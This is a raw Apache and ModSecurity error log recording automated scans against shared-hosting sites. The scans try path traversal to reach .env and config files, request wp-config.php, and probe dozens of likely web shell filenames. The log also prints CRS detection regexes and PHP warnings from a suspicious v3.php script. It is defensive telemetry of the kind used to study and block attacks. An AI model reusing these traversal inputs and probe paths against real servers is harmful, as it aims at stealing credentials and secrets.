[Tue May 12 05:23:37.979410 2026] [security2:error] [pid 1844863:tid 1844870] [client 45.148.10.238:36062] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/_profiler/open"] [unique_id "agKdOfaAnTZtx1_H_wy1qgAAAUE"]
[Tue May 12 05:23:38.831162 2026] [security2:error] [pid 1820198:tid 1820216] [client 45.148.10.238:60812] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc-s1tk6y7yBJLpJo4HwAAAJA"]
[Tue May 12 05:23:38.959593 2026] [security2:error] [pid 1842385:tid 1842400] [client 45.148.10.238:19802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdBBs7kySIUZ3ORnIkuwAAAQo"]
[Tue May 12 05:23:38.998105 2026] [security2:error] [pid 1842385:tid 1842395] [client 45.148.10.238:19832] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdBxs7kySIUZ3ORnIkvwAAAQU"]
[Tue May 12 05:23:40.354004 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/simple.php
PHP Warning:  filesize(): stat failed for /proc/23/task/23/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/23/task/23/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/23/task/23/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/23/task/23/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/23/task/23/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/23/task/23/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:23:40.479848 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/bgymj.php
[Tue May 12 05:23:40.981532 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/404.php
[Tue May 12 05:23:41.024610 2026] [security2:error] [pid 1842385:tid 1842392] [client 45.148.10.238:36072] ModSecurity: Warning. Matched phrase "config/app.php" at ARGS:file. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: config/app.php found within ARGS:file: app/config/app.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/_profiler/open"] [unique_id "agKdPRs7kySIUZ3ORnIk6wAAAQI"]
[Tue May 12 05:23:41.025099 2026] [security2:error] [pid 1842385:tid 1842392] [client 45.148.10.238:36072] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/_profiler/open"] [unique_id "agKdPRs7kySIUZ3ORnIk6wAAAQI"]
[Tue May 12 05:23:41.031665 2026] [core:error] [pid 1820198:tid 1820205] [client 45.148.10.238:36084] AH10244: invalid URI path (/js../../../.env)
[Tue May 12 05:23:41.132543 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/file3.php
[Tue May 12 05:23:42.644365 2026] [security2:error] [pid 1844863:tid 1844877] [client 45.148.10.238:57312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdGvaAnTZtx1_H_wy1eAAAAUg"]
[Tue May 12 05:23:43.126259 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.238:19842] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdCwgpmE1yW0glLdgsZQAAAMw"]
[Tue May 12 05:23:44.224715 2026] [core:error] [pid 1825287:tid 1825329] [client 45.148.10.238:30052] AH10244: invalid URI path (/js../../../../.env)
[Tue May 12 05:23:45.621382 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/wp-mail.php
[Tue May 12 05:23:45.754299 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/about.php
[Tue May 12 05:23:45.792260 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.238:33238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdEhfeipD4uoG21FovEQAAAAU"]
[Tue May 12 05:23:46.241199 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/wp.php
[Tue May 12 05:23:46.851454 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/adminfuns.php
[Tue May 12 05:23:46.978589 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/php8.php
[Tue May 12 05:23:47.463580 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/classwithtostring.php
[Tue May 12 05:23:47.618275 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/info.php
[Tue May 12 05:23:48.101179 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/ioxi-o.php
[Tue May 12 05:23:48.112483 2026] [security2:error] [pid 1844863:tid 1844873] [client 45.148.10.238:33252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdEvaAnTZtx1_H_wy1dAAAAUQ"]
[Tue May 12 05:23:48.227458 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/011i.php
[Tue May 12 05:23:48.261513 2026] [security2:error] [pid 1825287:tid 1825316] [client 45.148.10.238:30062] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdRAgpmE1yW0glLdgsvgAAAMs"]
[Tue May 12 05:23:48.261598 2026] [security2:error] [pid 1825287:tid 1825316] [client 45.148.10.238:30062] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdRAgpmE1yW0glLdgsvgAAAMs"]
[Tue May 12 05:23:48.261770 2026] [security2:error] [pid 1825287:tid 1825316] [client 45.148.10.238:30062] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdRAgpmE1yW0glLdgsvgAAAMs"]
[Tue May 12 05:23:48.730874 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/edit.php
[Tue May 12 05:23:48.856669 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/sid3.php
[Tue May 12 05:23:49.331880 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/load.php
[Tue May 12 05:23:49.459234 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/166.php
[Tue May 12 05:23:49.941512 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/wp-mail.php
[Tue May 12 05:23:50.067646 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/leaf.php
[Tue May 12 05:23:50.127956 2026] [security2:error] [pid 1820198:tid 1820223] [client 45.148.10.238:19866] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdC81tk6y7yBJLpJo4NgAAAJc"]
[Tue May 12 05:23:50.129299 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.238:57348] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdHdr1yOh9TvizezidywAAAEM"]
[Tue May 12 05:23:50.561471 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/grsiuk.php
[Tue May 12 05:23:50.694475 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/8.php
[Tue May 12 05:23:51.180983 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/fs.php
[Tue May 12 05:23:51.313524 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/ws38.php
[Tue May 12 05:23:51.800255 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/a7.php
[Tue May 12 05:23:51.931237 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/classsmtps.php
[Tue May 12 05:23:52.421692 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/amax.php
[Tue May 12 05:23:52.466312 2026] [security2:error] [pid 1820198:tid 1820201] [client 45.148.10.238:30090] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdSM1tk6y7yBJLpJo4iAAAAIE"]
[Tue May 12 05:23:52.466399 2026] [security2:error] [pid 1820198:tid 1820201] [client 45.148.10.238:30090] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdSM1tk6y7yBJLpJo4iAAAAIE"]
[Tue May 12 05:23:52.466573 2026] [security2:error] [pid 1820198:tid 1820201] [client 45.148.10.238:30090] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdSM1tk6y7yBJLpJo4iAAAAIE"]
[Tue May 12 05:23:52.547442 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/CDX1.php
[Tue May 12 05:23:53.007974 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/rip.php
[Tue May 12 05:23:53.134751 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/1.php
[Tue May 12 05:23:53.165444 2026] [security2:error] [pid 1825179:tid 1825197] [client 45.148.10.238:28584] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdKNr1yOh9Tvizezid2gAAAEA"]
[Tue May 12 05:23:53.661490 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/chosen.php
[Tue May 12 05:23:53.771633 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.238:28596] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdKBfeipD4uoG21FovOAAAAAI"]
[Tue May 12 05:23:53.794519 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/css.php
[Tue May 12 05:23:54.192340 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/php.php
[Tue May 12 05:23:54.329251 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/wp-Blogs.php
[Tue May 12 05:23:55.037227 2026] [security2:error] [pid 1825287:tid 1825321] [client 45.148.10.238:57336] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdHQgpmE1yW0glLdgscAAAANA"]
[Tue May 12 05:23:55.434492 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/ws83.php
[Tue May 12 05:23:55.552207 2026] [access_compat:error] [pid 1842385:tid 1842413] [client 45.148.10.238:26194] AH01797: client denied by server configuration: /home/letamsga/public_html/wp-config.php
[Tue May 12 05:23:55.560491 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/file61.php
[Tue May 12 05:23:55.600603 2026] [security2:error] [pid 1844863:tid 1844881] [client 45.148.10.238:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdIPaAnTZtx1_H_wy1fQAAAUw"]
[Tue May 12 05:23:55.694492 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/sadcut1.php
[Tue May 12 05:23:56.058710 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/y.php
[Tue May 12 05:23:56.184840 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/akcc.php
[Tue May 12 05:23:56.864496 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/term.php
[Tue May 12 05:23:56.872129 2026] [security2:error] [pid 1808852:tid 1808861] [client 45.148.10.238:33294] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdFxfeipD4uoG21FovGgAAAAY"]
[Tue May 12 05:23:57.345467 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/666.php
[Tue May 12 05:23:57.425992 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.238:33278] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdF_aAnTZtx1_H_wy1dgAAAVI"]
[Tue May 12 05:23:57.477624 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/7.php
[Tue May 12 05:23:57.901822 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/wp-config-sample.php
[Tue May 12 05:23:58.000152 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.238:7590] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdNhs7kySIUZ3ORnIk6QAAARE"]
[Tue May 12 05:23:58.032432 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/log.php
[Tue May 12 05:23:58.455805 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/a5.php
[Tue May 12 05:23:58.625653 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/aa.php
[Tue May 12 05:23:59.073814 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/bolt.php
[Tue May 12 05:23:59.201544 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/x.php
[Tue May 12 05:23:59.331254 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/jga.php
[Tue May 12 05:23:59.373058 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.238:7534] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdK81tk6y7yBJLpJo4YQAAAIY"]
[Tue May 12 05:23:59.460637 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/k.php
[Tue May 12 05:24:00.118501 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/vx.php
[Tue May 12 05:24:00.301680 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/ws77.php
[Tue May 12 05:24:00.324300 2026] [security2:error] [pid 1825179:tid 1825216] [client 45.148.10.238:26210] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/app/etc/env.php"] [unique_id "agKdUNr1yOh9Tvizezid9gAAAFI"]
